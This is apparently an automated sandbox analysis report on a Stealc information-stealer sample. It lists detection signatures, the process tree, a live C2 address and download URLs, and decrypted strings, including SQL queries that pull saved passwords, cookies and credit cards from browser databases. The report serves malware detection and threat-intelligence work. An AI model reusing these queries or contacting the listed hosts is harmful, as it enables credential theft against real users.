Edit tour

Windows Analysis Report
7gxaFDUSOD.exe

Overview

General Information

Sample name:	7gxaFDUSOD.exe renamed because original name is a hash value
Original sample name:	4c632322bff9d2562ebf7783cc411db8.exe
Analysis ID:	1572432
MD5:	4c632322bff9d2562ebf7783cc411db8
SHA1:	f9a82d6aa7867b3e55907c8976ecdc564195ae8d
SHA256:	4adede428b6bdfba962baae89274a4697e33f70fa4ee9265f2d945e83e408265
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

7gxaFDUSOD.exe (PID: 2060 cmdline: "C:\Users\user\Desktop\7gxaFDUSOD.exe" MD5: 4C632322BFF9D2562EBF7783CC411DB8)

4CC1.tmp.exe (PID: 3628 cmdline: "C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe" MD5: D8CE5C15818144C17BBB3BF250494439)

WerFault.exe (PID: 2112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 1316 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.3887735397.00000000009A9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xf88:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1975524031.00000000008EA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1128:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000003.1537789026.0000000002490000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1975546939.0000000000909000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: 4CC1.tmp.exe PID: 3628	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 4CC1.tmp.exe PID: 3628	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
3.3.4CC1.tmp.exe.2490000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.3.4CC1.tmp.exe.2490000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.4CC1.tmp.exe.2450e67.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.4CC1.tmp.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.4CC1.tmp.exe.2450e67.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.4CC1.tmp.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T15:12:24.508643+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49707	92.255.57.89	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T15:12:16.295065+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49705	104.21.56.70	443	TCP
2024-12-10T15:12:17.937923+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49706	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://92.255.57.89/45c616e921a794b8.php3	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpG0	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe	Avira URL Cloud: Label: malware
Source: http://92.255.57.89	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php8(	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll#	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpwininit.exe	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dll3g	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000003.1537789026.0000000002490000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: 7gxaFDUSOD.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 7gxaFDUSOD.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: 26
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: 12
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: 20
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: 24
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: OpenEventA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CreateEventA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Sleep
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: VirtualFree
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: VirtualAlloc
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: user32.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sscanf
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: VMwareVMware
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: DISPLAY
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: http://92.255.57.89
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: /45c616e921a794b8.php
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: /697b92cb4e247842/
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: default
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: HeapFree
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Process32Next
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Process32First
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: LocalFree
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: FindClose
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: ReadFile
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: WriteFile
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetLastError
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: TerminateProcess
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: rstrtmgr.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SelectObject
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: BitBlt
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GdipFree
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CoUninitialize
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CoInitialize
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CoCreateInstance
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: BCryptDecrypt
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetDC
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: wsprintfW
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RegEnumValueA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: StrStrA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: StrCmpCW
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: PathMatchSpecA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RmStartSession
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RmRegisterResources
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RmGetList
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: RmEndSession
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3_open
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3_step
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_text
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3_finalize
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3_close
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_blob
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: encrypted_key
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: PATH
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: NSS_Init
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: NSS_Shutdown
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: PK11_FreeSlot
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: PK11_Authenticate
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: C:\ProgramData\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: browser:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: profile:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: url:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: login:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: password:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Opera
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: OperaGX
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Network
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: cookies
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: .txt
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: TRUE
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: FALSE
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: autofill
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: history
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: cc
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: name:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: month:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: year:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: card:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Cookies
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Login Data
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Web Data
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: History
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: logins.json
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: formSubmitURL
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: usernameField
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: encryptedUsername
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: encryptedPassword
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: guid
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: cookies.sqlite
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: formhistory.sqlite
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: places.sqlite
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: plugins
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Local Extension Settings
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Sync Extension Settings
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: IndexedDB
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Opera Stable
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Opera GX Stable
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: CURRENT
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: chrome-extension_
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Local State
